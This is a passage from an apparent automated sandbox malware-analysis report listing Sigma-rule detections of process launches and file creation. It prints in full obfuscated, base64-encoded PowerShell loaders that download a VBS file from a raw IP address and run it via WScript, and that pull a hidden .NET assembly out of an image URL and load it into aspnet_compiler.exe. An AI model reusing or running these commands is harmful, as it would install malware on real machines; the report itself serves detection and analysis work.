'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJS
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICA
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , ProcessId: 3360, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5988, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2720, ProcessName: aspnet_compiler.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", ProcessId: 1492, ProcessName: csc.exe
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2872, TargetFilename: C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" , ProcessId: 3360, ProcessName: wscript.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2872, TargetFilename: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))", CommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgI

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhua